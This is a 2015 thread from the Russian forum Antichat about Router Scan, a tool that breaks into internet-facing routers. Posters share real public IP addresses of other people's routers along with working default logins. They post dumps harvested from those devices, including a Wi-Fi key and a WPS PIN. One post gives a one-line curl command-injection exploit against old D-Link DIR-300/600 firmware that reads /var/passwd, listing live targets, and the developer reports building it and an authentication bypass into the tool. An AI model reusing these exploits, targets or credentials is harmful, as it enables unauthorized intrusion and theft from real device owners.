HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Беспроводные технологии/Wi-Fi/Wardriving
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1161  
Старый 23.09.2015, 02:05
binarymaster
Флудер
Регистрация: 11.12.2010
Сообщений: 4,688
Провел на форуме:
997379

Репутация: 125


По умолчанию

Цитата:
Сообщение от XAMRAS  

Нет данных по данному роутеру:

195.49.185.19:80 admin:admin TP-LINK WindRiver Router

Уже добавил.

Код:
Address: http://195.49.185.19/
Time: 94 ms
Authorization: admin:admin
Device: TP-LINK TL-ER6120
BSSID: 
LAN IP: 10.49.1.11
LAN Subnet Mask: 255.255.255.0
WAN IP: 195.49.185.19
WAN Subnet Mask: 255.255.255.248
WAN Gateway: 195.49.185.17
Domain Name Servers: 77.243.0.12 77.243.0.27
Поскольку беспроводные с такой прошивкой мне ещё не встречались, оставил в BSSID.
 
Ответить с цитированием

  #1162  
Старый 23.09.2015, 17:05
binarymaster
Флудер
Регистрация: 11.12.2010
Сообщений: 4,688
Провел на форуме:
997379

Репутация: 125


По умолчанию

Цитата:
Сообщение от kolbak  

Как сюда прикреплять файлы, без обменника ?

В каких-то темах я видел возможность прикрепления, но тут вроде её нет.
 
Ответить с цитированием

  #1163  
Старый 24.09.2015, 12:32
zimmer
Active Member
Регистрация: 19.06.2015
Сообщений: 151
Провел на форуме:
51391

Репутация: 1
По умолчанию

binarymaster, вопрос по поводу вебкамер (ipкамер,видеорегистраторов и прочего) при скане часто попадаются они, но практически не детектируются...

в чем вопрос то (даже пожелание): есть ли в планах сделать поддержку камер (по сути она и так есть, но более побольше внимания им уделить), правда там есть свои нюансы: для просмотра в браузере большинство заточено под IE, каждый вендор имеет свой плагин, но для успешной авторизации плагин не нужен..

P.S.: перечитал - сам не понял что написал (немного пьян), но фак остаётся фактом, поддержка камер значительно бы увеличила привлекательность вашей программы... так же готов предоставить посильную помощ если возникнут какие трудности в реализации....
 
Ответить с цитированием

  #1164  
Старый 24.09.2015, 13:52
Felis-Sapiens
Постоянный
Регистрация: 21.07.2015
Сообщений: 594
Провел на форуме:
109967

Репутация: 171


По умолчанию

Уязвимость в старых прошивках DIR-300 (2.12, 2.13) и DIR-600 (2.12-2.14):

http://www.s3cur1ty.de/m1adv2013-003

tl;dr

Получение пароля:

Код:
curl --data "cmd=cat /var/passwd" http://ip/command.php
http://79.l65.122.75/

http://89.96.28.143:808O/

http://82.176.188.42:808O/
 
Ответить с цитированием

  #1165  
Старый 24.09.2015, 20:11
binarymaster
Флудер
Регистрация: 11.12.2010
Сообщений: 4,688
Провел на форуме:
997379

Репутация: 125


По умолчанию

Цитата:
Сообщение от kolbak  

Вопрос ко всем.

Нужна ли подобная инструкция ?

Пишите, пригодится.

Цитата:
Сообщение от zimmer  

есть ли в планах сделать поддержку камер

Если какие-либо камеры содержат настройки беспроводной сети - присылайте их IP адреса для изучения и добавления в поддержку. Я никогда не планирую добавление моделей, я добавляю в поддержку то, что мне присылают, либо что нахожу сам.

Цитата:
Сообщение от Felis-Sapiens  

Уязвимость в старых прошивках DIR-300 (2.12, 2.13) и DIR-600 (2.12-2.14):

http://www.s3cur1ty.de/m1adv2013-003

Благодарю! Исследую...
 
Ответить с цитированием

  #1166  
Старый 24.09.2015, 20:26
binarymaster
Флудер
Регистрация: 11.12.2010
Сообщений: 4,688
Провел на форуме:
997379

Репутация: 125


По умолчанию

Цитата:
Сообщение от Felis-Sapiens  

http://79.l65.122.75/

http://89.96.28.143:808O/

http://82.176.188.42:808O/

Уязвимость присутствует, но файл /var/passwd на всех устройствах пуст. Есть идеи?

UPD:

/var/etc/httpasswd тоже.

UPD 2:

Разобрался, добавил эксплойт в Router Scan.
 
Ответить с цитированием

  #1167  
Старый 25.09.2015, 00:11
kolbak
Member
Регистрация: 02.02.2011
Сообщений: 31
Провел на форуме:
10322

Репутация: 0
По умолчанию

Обнаружил проблему в работе с *.csv в версии 2.52

Открываю екселем - добавляю коментарий или редактирую таблицу, сохраняю.

RS отказывается брать данные. При сравнении файлов по содержимому видно что ексель убирает "" между ;

Будет ли исправлен стиль формирования *.csv или посоветуй программу в которой можно объединять свои *.csv и удалять лишние строки.

Добавил бы в RS работу с таблицами:

- добавление ранее сохранных таблиц в открытую, а не заменять (для объединения)

- работу с строками (Shift+↑ - выделить, Del - удалить отмеченное или выбранную строчку)
 
Ответить с цитированием

  #1168  
Старый 25.09.2015, 04:12
binarymaster
Флудер
Регистрация: 11.12.2010
Сообщений: 4,688
Провел на форуме:
997379

Репутация: 125


По умолчанию

Цитата:
Сообщение от kolbak  

это только DIR-300 и DIR-600 или эксплоит будет это пробовать на других роутерах?

Только на этих прошивках этой версии.

Цитата:
Сообщение от kolbak  

- добавление ранее сохранных таблиц в открытую, а не заменять (для объединения)

- работу с строками (Shift+↑ - выделить, Del - удалить отмеченное или выбранную строчку)

Попробую сделать.

Цитата:
Сообщение от kolbak  

вбил пару ради прикола, а тут
Похоже на баг... он пытается авторизоваться не на той странице, получает код 200 OK...

UPD: исправил баг.

>Интересный PIN

Так сработал один из сплойтов, видимо структура данных отличается, поэтому крякозябры.

>Thomson STB2.01.72

STB2.01.72 добавил.

>Не отдался (((

Он при попытке авторизации отдаёт код 404 (не найдено), хотя должен 401. Видимо какая-то хитрость...

UPD: обошёл её кодом (Code div 100 <> 4) и получил доступ.

Код:
Address: http://83.221.168.157/
Time: 110 ms
Authorization: support:support
Device: Micro DSL (DSL-2750U 963281TAVNG | B038 K8B 0K ME3G-00-test-3388.V03)
BSSID: AC:F1:DF:F1:47:DD
ESSID: DLink
Security type: WPA/WPA2
Key: 3279808zz
WPS Pin: 31957199
LAN IP: 192.168.1.1
LAN Subnet Mask: 255.255.255.0
WAN IP: 83.221.168.157
Domain Name Servers: 217.29.116.2 8.8.8.8
 
Ответить с цитированием

  #1169  
Старый 25.09.2015, 15:04
Felis-Sapiens
Постоянный
Регистрация: 21.07.2015
Сообщений: 594
Провел на форуме:
109967

Репутация: 171


По умолчанию

Ericsson GPON SBM4F00ARA - не парсит данные wifi

http://admin:[email protected]/
 
Ответить с цитированием

  #1170  
Старый 25.09.2015, 15:48
sha9
Постоянный
Регистрация: 25.09.2015
Сообщений: 562
Провел на форуме:
168564

Репутация: 2


По умолчанию

доброго времени суток.давно с вами, но не регался.специально зарегистрировался чтобы - во-первых высказать свое восхищение сканом, самой идеей и естественно- реализацией. во-вторых заметить, что TL-WR-740N парсит только дефолтовые пароли, эксплойты не работают ( у меня во всяком случае). а если парсит дефолтовый пароль не вытаскивает вайфай. есть тоже проблема с DIR-640 NRU - тащит мак, но дальше не хочет. с микротиком вообще не дружит.только дефолты, а это редкость. ну это понятно. если будет такая возможность нельзя ли учесть это в новых сборках РС?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.